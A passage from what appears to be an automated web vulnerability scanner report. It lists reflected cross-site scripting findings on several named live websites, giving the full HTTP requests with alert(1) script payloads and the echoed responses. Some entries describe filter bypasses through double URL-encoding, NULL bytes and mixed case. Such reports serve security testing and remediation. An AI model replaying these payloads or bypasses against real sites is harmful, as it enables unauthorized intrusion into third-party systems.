Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:13:57 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=gkHwNGtVg9TBbhBH5VnXTRhqhzdypKcY9KxLLhJj1Qzy1NQNyJhL!-2063012567!1321864744; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110127006192 and language = enf984c<script>alert(1)</script>dd66a2a361d.</span>
...[SNIP]...

1.123. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c3acb%253cscript%253ealert%25281%2529%253c%252fscript%253e5906f30c114 was submitted in the REST URL parameter 3. This input was echoed as c3acb<script>alert(1)</script>5906f30c114 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110127006192c3acb%253cscript%253ealert%25281%2529%253c%252fscript%253e5906f30c114/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:37 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=hk8QNHMVvlKKvnqF3NsLtzYMKv92hJDG6nCD8th2fZ2QkBLmdNhG!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Connection: close
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110127006192c3acb<script>alert(1)</script>5906f30c114 and language = en.</span>
...[SNIP]...

1.124. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38c53%253cscript%253ealert%25281%2529%253c%252fscript%253ec658d7d2df2 was submitted in the REST URL parameter 4. This input was echoed as 38c53<script>alert(1)</script>c658d7d2df2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110127006192/en38c53%253cscript%253ealert%25281%2529%253c%252fscript%253ec658d7d2df2/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:42 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=6HxzNHMhTwsn2NLbzvqLnVp3DBTCldHg32f1WmPJqngpjQ9sFBvz!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Connection: close
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110127006192 and language = en38c53<script>alert(1)</script>c658d7d2df2.</span>
...[SNIP]...

1.125. http://www.businesswire.com/news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 850ba%253cscript%253ealert%25281%2529%253c%252fscript%253ed36770b8b1f was submitted in the REST URL parameter 3. This input was echoed as 850ba<script>alert(1)</script>d36770b8b1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110131005660850ba%253cscript%253ealert%25281%2529%253c%252fscript%253ed36770b8b1f/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:28 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=JrpBNHMMFN2n2z5vSJMTlfC94k0h1VGSk46nKQGfzvsVLVvXf6yR!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Connection: close
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110131005660850ba<script>alert(1)</script>d36770b8b1f and language = en.</span>
...[SNIP]...

1.126. http://www.businesswire.com/news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cd02%253cscript%253ealert%25281%2529%253c%252fscript%253e52097846f2 was submitted in the REST URL parameter 4. This input was echoed as 6cd02<script>alert(1)</script>52097846f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110131005660/en6cd02%253cscript%253ealert%25281%2529%253c%252fscript%253e52097846f2/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:32 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=YvGzNHMQ2z92nnrBLLJmwQytxMdFy6tyGLKfrSyGKFpNsLslR6dc!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Connection: close
Content-Length: 22342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110131005660 and language = en6cd02<script>alert(1)</script>52097846f2.</span>
...[SNIP]...

1.127. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /portal/site/home/template.BWPOPUP/permalink/

Issue detail

The value of the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8658d"><script>alert(1)</script>1914e400a0c was submitted in the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/site/home/template.BWPOPUP/permalink/?javax.portlet.tpst=c3eb0ec6c81ef7157972709ddb808a0c_ws_MX&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang=en&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_viewID=email_release_popup&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink=http%3A%2F%2Fwww.businesswire.com%2Fnews%2Fhome%2F20110127006192%2Fen%2FVeracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId=201101270061928658d"><script>alert(1)</script>1914e400a0c&beanID=1933350696&viewID=email_release_popup&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:57 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=sytmNHMKS2CpJk6LCGKzGyGZpQGM91TRRQv9ccQnwhZW8fgbSWBr!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Vignette-RespondedWith: AJAX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bus
...[SNIP]...
<input type="hidden" name="newsId" value="201101270061928658d"><script>alert(1)</script>1914e400a0c" />
...[SNIP]...

1.128. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /portal/site/home/template.BWPOPUP/permalink/

Issue detail

The value of the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43fd"><script>alert(1)</script>7d138ca5706 was submitted in the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/site/home/template.BWPOPUP/permalink/?javax.portlet.tpst=c3eb0ec6c81ef7157972709ddb808a0c_ws_MX&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang=enc43fd"><script>alert(1)</script>7d138ca5706&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_viewID=email_release_popup&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink=http%3A%2F%2Fwww.businesswire.com%2Fnews%2Fhome%2F20110127006192%2Fen%2FVeracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId=20110127006192&beanID=1933350696&viewID=email_release_popup&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:50 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=QG6tNHMGcBnMpQ1vTkKYgqp5dcFfpGyBnJvhmMGLRn6nTR224kJn!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Vignette-RespondedWith: AJAX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bus
...[SNIP]...
<input type="hidden" name="newsLang" value="enc43fd"><script>alert(1)</script>7d138ca5706" />
...[SNIP]...

1.129. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /portal/site/home/template.BWPOPUP/permalink/

Issue detail

The value of the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c2d9"><script>alert(1)</script>7560c4ee1fb was submitted in the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/site/home/template.BWPOPUP/permalink/?javax.portlet.tpst=c3eb0ec6c81ef7157972709ddb808a0c_ws_MX&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang=en&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_viewID=email_release_popup&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink=http%3A%2F%2Fwww.businesswire.com%2Fnews%2Fhome%2F20110127006192%2Fen%2FVeracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming3c2d9"><script>alert(1)</script>7560c4ee1fb&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId=20110127006192&beanID=1933350696&viewID=email_release_popup&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:54 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=sVpMNHMHdYbd6kwP6yhTQLkr7sSjKhyj8LxSR0QvF7kcvhx18Lh6!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Vignette-RespondedWith: AJAX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bus
...[SNIP]...
<input type="hidden" name="permalink" value="http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming3c2d9"><script>alert(1)</script>7560c4ee1fb" />
...[SNIP]...

1.130. http://www.dinclinx.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dinclinx.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8110a<script>alert(1)</script>3ce872fd7a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=886&e=0&t=635&f=javascript&8110a<script>alert(1)</script>3ce872fd7a6=1 HTTP/1.1
Host: www.dinclinx.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 17:14:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 31 Jan 2011 17:14:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 8110a<script>alert(1)</script>3ce872fd7a6

1.131. http://www.ereadable.com/scripts/browse.asp [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ereadable.com
Path:   /scripts/browse.asp

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1153f"><ScRiPt>alert(1)</ScRiPt>41d7d8c7343 was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /scripts/browse.asp?ref=0080553400&source=1153f"><ScRiPt>alert(1)</ScRiPt>41d7d8c7343 HTTP/1.1
Host: www.ereadable.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 19:32:25 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 14009
Content-Type: text/html
Set-Cookie: source=1153f%22%3E%3CScRiPt%3Ealert%281%29%3C%2FScRiPt%3E41d7d8c7343; expires=Tue, 31-Jan-2012 00:00:00 GMT; domain=ereadable.com; path=/
Set-Cookie: SESSION%5FID=7D4CE2DC00000F3600004885A4240069004DBACC; domain=ereadable.com; path=/
Cache-control: private


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Product not found : eReadable</title>

<meta name="title" content="Product not found" />


<
...[SNIP]...
<a href="/scripts/browse.asp?ref=0080553400&source=1153f"><ScRiPt>alert(1)</ScRiPt>41d7d8c7343">
...[SNIP]...

1.132. http://www.haymarketbusinesssubs.com/subscriptions/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haymarketbusinesssubs.com
Path:   /subscriptions/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 199c9"-alert(1)-"ce6460bfe43 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscriptions/?fuseaction=viewItem&cat=20199c9"-alert(1)-"ce6460bfe43&itemID=SCWEB09GBP01 HTTP/1.1
Host: www.haymarketbusinesssubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Page not found
Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/
Connection: close
Date: Mon, 31 Jan 2011 19:48:13 GMT
Server: Microsoft-IIS/6.0
X-HMIO-Server: HBIWeb1
X-Powered-By: ASP.NET
Set-Cookie: CFID=970753;expires=Wed, 23-Jan-2041 19:48:13 GMT;path=/
Set-Cookie: CFTOKEN=55220764;expires=Wed, 23-Jan-2041 19:48:13 GMT;path=/
Set-Cookie: JSESSIONID=5630b9be91597d16c194;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
VARIABLES
   hbx.acct="DM5606269AEF84EN3";//ACCOUNT NUMBER(S)
   hbx.pn="404";//PAGE NAME(S)
   hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?FUSEACTION=VIEWITEM&CAT=20199C9"-ALERT(1)-"CE6460BFE43&ITEMID=SCWEB09GBP01?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY
   hbx.pndef="index.cfm";//DEFAULT PAGE NAME
   hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
   
   //OPTIONAL PAGE VARIABLES
   //ACTION SETT
...[SNIP]...

1.133. http://www.haymarketbusinesssubs.com/subscriptions/ [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haymarketbusinesssubs.com
Path:   /subscriptions/

Issue detail

The value of the fuseaction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cab60"-alert(1)-"ced730ffdfc was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscriptions/?fuseaction=viewItemcab60"-alert(1)-"ced730ffdfc&cat=20&itemID=SCWEB09GBP01 HTTP/1.1
Host: www.haymarketbusinesssubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Page not found
Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/
Connection: close
Date: Mon, 31 Jan 2011 19:48:05 GMT
Server: Microsoft-IIS/6.0
X-HMIO-Server: HBIWeb1
X-Powered-By: ASP.NET
Set-Cookie: CFID=970737;expires=Wed, 23-Jan-2041 19:48:05 GMT;path=/
Set-Cookie: CFTOKEN=86237119;expires=Wed, 23-Jan-2041 19:48:05 GMT;path=/
Set-Cookie: JSESSIONID=5630932a02f217556153;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
URATION VARIABLES
   hbx.acct="DM5606269AEF84EN3";//ACCOUNT NUMBER(S)
   hbx.pn="404";//PAGE NAME(S)
